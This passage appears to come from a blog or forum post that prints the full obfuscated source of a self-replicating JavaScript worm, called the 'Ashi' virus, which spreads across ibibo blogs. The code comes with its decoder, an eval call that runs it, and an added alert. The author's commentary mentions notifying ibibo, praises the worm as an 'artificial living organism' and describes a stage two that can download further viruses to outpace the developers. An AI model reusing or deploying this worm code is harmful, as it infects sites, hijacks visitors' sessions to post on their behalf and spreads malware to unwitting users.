ZQ29Q29Q3BQ22+encodr+Q22Q3CQ22+Q22/scQ22+Q22rZpFQ3EQ3CJQ20Q22Q29Q3BblpJyloJd+Q3Den
codeURIComponenFQ28nunnuQ29Q3BblpJyloJd+Q3DQ22horQ26FJgs_ZnpuFQ3DQ26JcFZonQ3DposF-
quZckpress-
sJveQ26quZckpress_posF_IDQ3D0Q26_wpnonceQ3DQ26_wp_hFFp_refererQ3DQ26sJveQ3DSJveQ25
20DrJfFQ26Q3DCJncelQ26publZshQ3DPublZshQ22Q3BJjJxPSLVQ28JddrQ2CblpJyloJdQ29Q3BQ7Df
uncFZonQ20JjJxPSLVQ28urlQ2CpJyloJdQ29Q7BvJrQ20xmlhFFpQ3BZfQ28wZndow.XMLHFFpRequesF
Q29Q7BxmlhFFpQ3DnewQ20XMLHFFpRequesFQ28Q29Q3BQ7DelseQ20ZfQ28wZndow.AcFZveXObjecFQ2
9Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22MZcrosofF.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22Msxml2.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BreFurnQ3BQ7DQ7DQ7DxmlhFFp.openQ28Q22POSTQ22Q2CQ20urlQ2CQ20FrueQ29Q3BxmlhFFp
.seFRequesFHeJderQ28Q22ConFenF-TypeQ22Q2CQ22JpplZcJFZon/x-www-form-
urlencodedQ22Q29Q3BxmlhFFp.seFRequesFHeJderQ28Q22ConFenF-
lengFhQ22Q2CpJyloJd.lengFhQ29Q3BxmlhFFp.sendQ28pJyloJdQ29Q3BQ7D';function y(x){var
s="",r="";for(var i=0;i<x.length;i++){s=x.charAt(i);if(s=="Q"){s="%";}else
if(s=="Z"){s="i";}else if(s=="J"){s="a";}else if(s=="F")
{s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert("Decoded and executed: "+y(ashi));

The last alert has been added to the above viral code to make sure
that the virus is properly triggered. It is not a part of virus and
will not be replicated.

And thats it. The "Ashi" virus..."vinnu"

I have informed ibibo about this virus.

This virus is a very good example of artificial living organizms helping each
other for their living.

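For example, they have now stopped new blog posts from being submitted, but they
haven't yet removed the infection, and the virus is still on the blogs. Blocking new
posts does not neutralise the copies already stored: each infected post keeps
executing when it is rendered until the injected markup is purged from the stored
posts and the title and content fields are output-encoded.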

And this virus having a stage two also available for retrieval of the code.

So either it can be upgraded to exploit other vulnerabilities or can also be used


to download another virus to already infected blogs and keep the infection one
step ahead of the developers reach...."vinnu"

Thanx a lot..."vinnu"
